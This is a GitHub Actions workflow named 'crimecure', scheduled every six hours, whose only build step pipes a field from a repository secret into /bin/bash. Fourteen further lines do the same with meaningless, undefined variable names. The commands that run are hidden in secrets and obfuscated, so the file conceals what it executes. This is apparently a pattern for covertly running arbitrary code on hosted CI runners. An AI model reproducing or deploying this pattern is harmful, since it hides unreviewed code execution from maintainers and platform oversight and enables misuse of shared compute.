name: crimecure
on:
  workflow_dispatch:
  schedule:
    - cron: '53 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: crimecure
        env:
          l29: ${{ secrets.l29 }}
        run: |
          echo $l29 | jq -r .g5 | /bin/bash
          echo $opq726 | jq -r .q83891 | /bin/bash
          echo $dvcz790 | jq -r .mi0953 | /bin/bash
          echo $opgys5238 | jq -r .hqb1473 | /bin/bash
          echo $tmex5 | jq -r .rcyds40 | /bin/bash
          echo $icp23 | jq -r .v08 | /bin/bash
          echo $bivcm20 | jq -r .yv5 | /bin/bash
          echo $fjhmw2 | jq -r .tnr8264 | /bin/bash
          echo $oct0 | jq -r .xqhk2 | /bin/bash
          echo $f377 | jq -r .bmjeo996 | /bin/bash
          echo $sxn8015 | jq -r .o1 | /bin/bash
          echo $q81 | jq -r .qfi83 | /bin/bash
          echo $jpz8 | jq -r .kxsi7156 | /bin/bash
          echo $hfoab48213 | jq -r .sge319 | /bin/bash
          echo $rtoud333 | jq -r .hgrbq0383 | /bin/bash

